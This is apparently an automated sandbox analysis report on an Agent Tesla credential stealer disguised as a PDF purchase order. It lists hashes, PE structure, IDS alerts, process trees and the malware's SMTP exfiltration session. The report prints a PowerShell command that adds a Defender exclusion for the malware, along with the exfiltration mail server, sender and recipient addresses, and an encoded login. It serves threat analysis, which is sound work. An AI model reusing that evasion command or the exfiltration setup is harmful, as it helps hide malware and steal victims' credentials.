                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                      Process:C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):1216
                                      Entropy (8bit):5.34331486778365
                                      Encrypted:false
                                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                      MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                      SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                      SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                      SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                      Malicious:false
                                      Reputation:high, very likely benign file
                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):64
                                      Entropy (8bit):0.7307872139132228
                                      Encrypted:false
                                      SSDEEP:3:NlllulF/lll:NllUF/ll
                                      MD5:3ECB05F56210644B241FF459B861D309
                                      SHA1:1A33420F5866C42A5ED3CFF0DD505451FBFA8072
                                      SHA-256:712FFFDDF0CCED8E7AD767551D53F38D2682E171595701A31F73AC916F7134E0
                                      SHA-512:79DC8B376BDAE7F0BA59108D89D9DA4CD6B1E7AB0280DB31A030E4C4507AB63D22D9DF6443DE18E92D64382AA97F051AC1D6FAFE07CA9281BEBD129A91EB19B8
                                      Malicious:false
                                      Reputation:moderate, very likely benign file
                                      Preview:@...e.................................^.........................
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Reputation:high, very likely benign file
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):959488
                                      Entropy (8bit):7.9475757386482515
                                      Encrypted:false
                                      SSDEEP:24576:cca028CkoVwvyTIv+WSLFhnfksXOQcFez3aqmUY:cb3XwKTIv+TFRfksXvTY
                                      MD5:2226B8A2AC6E61DD5BC5327D48C74E1C
                                      SHA1:7B7B425DF447FB64ABFBF7FE34D336B13D8D8BB0
                                      SHA-256:72629B026D1626923F7D3280D0DABB7C1A9EE869B7CE9EC2F02C949544C8326F
                                      SHA-512:0560B84DA47F73C13D9EE9762F1B53E88E4A87C7154E5203DBDAFC50C18D502EAAA40A54DAD91F0AA2164BCDBE16AA2B5D3BD97F1C8F3AE7C7E871067E04615A
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 24%
                                      • Antivirus: Virustotal, Detection: 32%, Browse
                                      Process:C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):26
                                      Entropy (8bit):3.95006375643621
                                      Encrypted:false
                                      SSDEEP:3:ggPYV:rPYV
                                      MD5:187F488E27DB4AF347237FE461A079AD
                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                      Malicious:true
                                      Preview:[ZoneTransfer]....ZoneId=0
                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Entropy (8bit):7.9475757386482515
                                      TrID:
                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                      • Win32 Executable (generic) a (10002005/4) 49.75%
                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                      • Windows Screen Saver (13104/52) 0.07%
                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                      File name:PO-2024)bekotas.pdf.exe
                                      File size:959'488 bytes
                                      MD5:2226b8a2ac6e61dd5bc5327d48c74e1c
                                      SHA1:7b7b425df447fb64abfbf7fe34d336b13d8d8bb0
                                      SHA256:72629b026d1626923f7d3280d0dabb7c1a9ee869b7ce9ec2f02c949544c8326f
                                      SHA512:0560b84da47f73c13d9ee9762f1b53e88e4a87c7154e5203dbdafc50c18d502eaaa40a54dad91f0aa2164bcdbe16aa2b5d3bd97f1c8f3ae7c7e871067e04615a
                                      SSDEEP:24576:cca028CkoVwvyTIv+WSLFhnfksXOQcFez3aqmUY:cb3XwKTIv+TFRfksXvTY
                                      TLSH:FF1523725792CF51D43E4BFA8839A1511B31FC2E1031DA5FAD82F4EB59B27245AA0F23
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....+...............0..<...f.......Z... ...`....@.. ....................................@................................
                                      Icon Hash:66666667e69c310e
                                      Entrypoint:0x4e5ace
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                      Time Stamp:0xC92BF28A [Sun Dec 13 15:55:54 2076 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:4
                                      OS Version Minor:0
                                      File Version Major:4
                                      File Version Minor:0
                                      Subsystem Version Major:4
                                      Subsystem Version Minor:0
                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                      Instruction
                                      jmp dword ptr [00402000h]
                                      add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xe5a79 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xe6000 | 0x6400 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xee000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xe3d58 | 0x70 | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xe3ad4 | 0xe3c00 | 83dd652505cd57995e046e0389fedbee | False | 0.9713120026070252 | data | 7.976240450007284 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xe6000 | 0x6400 | 0x6400 | 3c3c9b21e50bfec32f3090f1b621ae07 | False | 0.3955078125 | data | 5.147657186895511 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xee000 | 0xc | 0x200 | c60ecbe4e86dc4887abce61a538903b3 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xe61e0 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | | | 0.2701612903225806
RT_ICON | 0xe64d8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | | | 0.4966216216216216
RT_ICON | 0xe6610 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | | | 0.5439765458422174
RT_ICON | 0xe74c8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | | | 0.6656137184115524
RT_ICON | 0xe7d80 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | | | 0.5021676300578035
RT_ICON | 0xe82f8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | | | 0.3157676348547718
RT_ICON | 0xea8b0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | | | 0.4090056285178236
RT_ICON | 0xeb968 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | | | 0.5859929078014184
RT_GROUP_ICON | 0xebde0 | 0x76 | data | | | 0.6440677966101694
RT_VERSION | 0xebe68 | 0x398 | OpenPGP Public Key | | | 0.4206521739130435
RT_MANIFEST | 0xec210 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
07/03/24-09:49:42.787550 | TCP | 2855542 | ETPRO TROJAN Agent Tesla CnC Exfil Activity | 64941 | 587 | 192.168.2.5 | 108.167.140.123
07/03/24-09:49:42.787550 | TCP | 2851779 | ETPRO TROJAN Agent Tesla Telegram Exfil | 64941 | 587 | 192.168.2.5 | 108.167.140.123
07/03/24-09:49:42.787550 | TCP | 2840032 | ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 | 64941 | 587 | 192.168.2.5 | 108.167.140.123
07/03/24-09:49:42.787473 | TCP | 2839723 | ETPRO TROJAN Win32/Agent Tesla SMTP Activity | 64941 | 587 | 192.168.2.5 | 108.167.140.123
07/03/24-09:49:42.787473 | TCP | 2030171 | ET TROJAN AgentTesla Exfil Via SMTP | 64941 | 587 | 192.168.2.5 | 108.167.140.123
                                      Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                      Jul 3, 2024 09:48:46.543953896 CEST | 53 | 54216 | 162.159.36.2 | 192.168.2.5
                                      Jul 3, 2024 09:48:47.234317064 CEST | 53 | 59330 | 1.1.1.1 | 192.168.2.5
                                      Jul 3, 2024 09:49:40.357806921 CEST | 65496 | 53 | 192.168.2.5 | 1.1.1.1
                                      Jul 3, 2024 09:49:40.680640936 CEST | 53 | 65496 | 1.1.1.1 | 192.168.2.5

                                      Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                      Jul 3, 2024 09:49:40.357806921 CEST | 192.168.2.5 | 1.1.1.1 | 0xc13f | Standard query (0) | mail.musabody.com | A (IP address) | IN (0x0001) | false

                                      Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                      Jul 3, 2024 09:49:40.680640936 CEST | 1.1.1.1 | 192.168.2.5 | 0xc13f | No error (0) | mail.musabody.com | | 108.167.140.123 | A (IP address) | IN (0x0001) | false

                                      Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
                                      Jul 3, 2024 09:49:41.457690001 CEST | 587 | 64941 | 108.167.140.123 | 192.168.2.5 | 220-gator4156.hostgator.com ESMTP Exim 4.96.2 #2 Wed, 03 Jul 2024 02:49:41 -0500
                                      220-We do not authorize the use of this system to transport unsolicited,
                                      220 and/or bulk e-mail.
                                      Jul 3, 2024 09:49:41.459357977 CEST | 64941 | 587 | 192.168.2.5 | 108.167.140.123 | EHLO 571345
                                      Jul 3, 2024 09:49:41.622400999 CEST | 587 | 64941 | 108.167.140.123 | 192.168.2.5 | 250-gator4156.hostgator.com Hello 571345 [8.46.123.33]
                                      250-SIZE 52428800
                                      250-8BITMIME
                                      250-PIPELINING
                                      250-PIPECONNECT
                                      250-AUTH PLAIN LOGIN
                                      250-STARTTLS
                                      250 HELP
                                      Jul 3, 2024 09:49:41.623624086 CEST | 64941 | 587 | 192.168.2.5 | 108.167.140.123 | AUTH login dmljdG9yaWFAbXVzYWJvZHkuY29t
                                      Jul 3, 2024 09:49:41.785621881 CEST | 587 | 64941 | 108.167.140.123 | 192.168.2.5 | 334 UGFzc3dvcmQ6
                                      Jul 3, 2024 09:49:42.248657942 CEST | 587 | 64941 | 108.167.140.123 | 192.168.2.5 | 235 Authentication succeeded
                                      Jul 3, 2024 09:49:42.248914003 CEST | 64941 | 587 | 192.168.2.5 | 108.167.140.123 | MAIL FROM:<victoria@musabody.com>
                                      Jul 3, 2024 09:49:42.408921003 CEST | 587 | 64941 | 108.167.140.123 | 192.168.2.5 | 250 OK
                                      Jul 3, 2024 09:49:42.409084082 CEST | 64941 | 587 | 192.168.2.5 | 108.167.140.123 | RCPT TO:<pritchardchristopher281@gmail.com>
                                      Jul 3, 2024 09:49:42.622764111 CEST | 587 | 64941 | 108.167.140.123 | 192.168.2.5 | 250 Accepted
                                      Jul 3, 2024 09:49:42.627125025 CEST | 64941 | 587 | 192.168.2.5 | 108.167.140.123 | DATA
                                      Jul 3, 2024 09:49:42.786854982 CEST | 587 | 64941 | 108.167.140.123 | 192.168.2.5 | 354 Enter message, ending with "." on a line by itself
                                      Jul 3, 2024 09:49:42.787580013 CEST | 64941 | 587 | 192.168.2.5 | 108.167.140.123 | .
                                      Jul 3, 2024 09:49:43.052591085 CEST | 587 | 64941 | 108.167.140.123 | 192.168.2.5 | 250 OK id=1sOukI-003o0R-2G
                                      Jul 3, 2024 09:51:20.379566908 CEST | 64941 | 587 | 192.168.2.5 | 108.167.140.123 | QUIT
                                      Jul 3, 2024 09:51:20.744268894 CEST | 587 | 64941 | 108.167.140.123 | 192.168.2.5 | 221 gator4156.hostgator.com closing connection

                                      Target ID:0
                                      Start time:03:47:52
                                      Start date:03/07/2024
                                      Path:C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe"
                                      Imagebase:0x760000
                                      File size:959'488 bytes
                                      MD5 hash:2226B8A2AC6E61DD5BC5327D48C74E1C
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2014871271.0000000003B19000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2014871271.0000000003B19000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:true

                                      Target ID:3
                                      Start time:03:47:53
                                      Start date:03/07/2024
                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe"
                                      Imagebase:0xb20000
                                      File size:433'152 bytes
                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:4
                                      Start time:03:47:53
                                      Start date:03/07/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:5
                                      Start time:03:47:53
                                      Start date:03/07/2024
                                      Path:C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe"
                                      Imagebase:0x7e0000
                                      File size:959'488 bytes
                                      MD5 hash:2226B8A2AC6E61DD5BC5327D48C74E1C
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.4459041571.0000000002AA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:false

                                      Target ID:6
                                      Start time:03:48:07
                                      Start date:03/07/2024
                                      Path:C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
                                      Imagebase:0xae0000
                                      File size:959'488 bytes
                                      MD5 hash:2226B8A2AC6E61DD5BC5327D48C74E1C
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2167208545.0000000004024000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2167208545.0000000004024000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2167208545.0000000003FA9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2167208545.0000000003FA9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Antivirus matches:
                                      • Detection: 100%, Joe Sandbox ML
                                      • Detection: 24%, ReversingLabs
                                      • Detection: 32%, Virustotal, Browse
                                      Reputation:low
                                      Has exited:true

                                      Target ID:7
                                      Start time:03:48:08
                                      Start date:03/07/2024
                                      Path:C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
                                      Imagebase:0x380000
                                      File size:959'488 bytes
                                      MD5 hash:2226B8A2AC6E61DD5BC5327D48C74E1C
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      Target ID:8
                                      Start time:03:48:08
                                      Start date:03/07/2024
                                      Path:C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
                                      Imagebase:0x780000
                                      File size:959'488 bytes
                                      MD5 hash:2226B8A2AC6E61DD5BC5327D48C74E1C
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2228074088.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.2228074088.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2231602205.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:true

                                      Target ID:10
                                      Start time:03:48:16
                                      Start date:03/07/2024
                                      Path:C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
                                      Imagebase:0xd60000
                                      File size:959'488 bytes
                                      MD5 hash:2226B8A2AC6E61DD5BC5327D48C74E1C
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.2255092408.00000000042A9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.2255092408.00000000042A9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.2255092408.0000000004344000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.2255092408.0000000004344000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:true

                                      Target ID:11
                                      Start time:03:48:17
                                      Start date:03/07/2024
                                      Path:C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
                                      Imagebase:0x820000
                                      File size:959'488 bytes
                                      MD5 hash:2226B8A2AC6E61DD5BC5327D48C74E1C
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.4457826484.0000000002BDB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:false

                                        Execution Graph

                                        Execution Coverage:10.1%
                                        Dynamic/Decrypted Code Coverage:100%
                                        Signature Coverage:10.1%
                                        Total number of Nodes:257
                                        Total number of Limit Nodes:12

                                        APIs
                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 04AF1BE6
                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 04AF1CC8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2016568014.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4af0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID: AllocMemoryProcessVirtualWrite
                                        • String ID:
                                        • API String ID: 645232735-0
                                        • Opcode ID: bf22b85f8f1b01885cbdf0b397b7f6c146d5e30c3943ea9ac22353b3c07a432b
                                        • Instruction ID: f44ed3818d6ec574c4f70ea84a4b8c176503d449007bb4d615dd1cf9e55ed1f9
                                        • Opcode Fuzzy Hash: bf22b85f8f1b01885cbdf0b397b7f6c146d5e30c3943ea9ac22353b3c07a432b
                                        • Instruction Fuzzy Hash: BB316AB6900209CFCB10DFA9C8457EEFBF1FF48310F10882AE559A7250D7789945CBA0

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Te]q$Te]q
                                        • API String ID: 0-3320153681
                                        • Opcode ID: 4ada9a429e62f31ca02d6e79664d7b72fadd7c3f78ebd55d35f397b29b07fd2e
                                        • Instruction ID: 01a4a496fc64f40b8e11eb6d04a73461b26c74594fa1d56a392448d95bda0302
                                        • Opcode Fuzzy Hash: 4ada9a429e62f31ca02d6e79664d7b72fadd7c3f78ebd55d35f397b29b07fd2e
                                        • Instruction Fuzzy Hash: A151F775B10116CFDB08DFA8D9556BEBBB7FF88700F15806AE502EB390CA348D058B91

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Te]q$Te]q
                                        • API String ID: 0-3320153681
                                        • Opcode ID: 041aff4ffbaa5a341b405199b0aff0401756c97eb60bbdd12ceea737345156b7
                                        • Instruction ID: 128d945ea7e22a6a3fd2b8fb80eea60c094f4afaf6584a8a16239ceb9040948e
                                        • Opcode Fuzzy Hash: 041aff4ffbaa5a341b405199b0aff0401756c97eb60bbdd12ceea737345156b7
                                        • Instruction Fuzzy Hash: 1941B235B101168FDB48DFA9D9556AEFBB7FB88700F21452AE602EB794CA348D018B91
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017165313.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50b0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4d8ae768b6f39c979ff0f4ca5e8db78e403eb6884d95959446514dbad736efcc
                                        • Instruction ID: fa3966e74c12efafc3b31abd26bb981e812c3f0d8e6bad5da61daa6b31215dee
                                        • Opcode Fuzzy Hash: 4d8ae768b6f39c979ff0f4ca5e8db78e403eb6884d95959446514dbad736efcc
                                        • Instruction Fuzzy Hash: 49524F34A002058FCB14DF68C884BD9B7B2FF85314F2586E9D5586F3A2DBB5A986CF41
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017165313.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50b0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 19353378803cef294b4f1ea0a6f1cca3fe9e29247cf81842443a08803b6edf5d
                                        • Instruction ID: 566de9b29d3b75be32f4f637013f7522d63342682083c4d3cbe00ee1b17d46de
                                        • Opcode Fuzzy Hash: 19353378803cef294b4f1ea0a6f1cca3fe9e29247cf81842443a08803b6edf5d
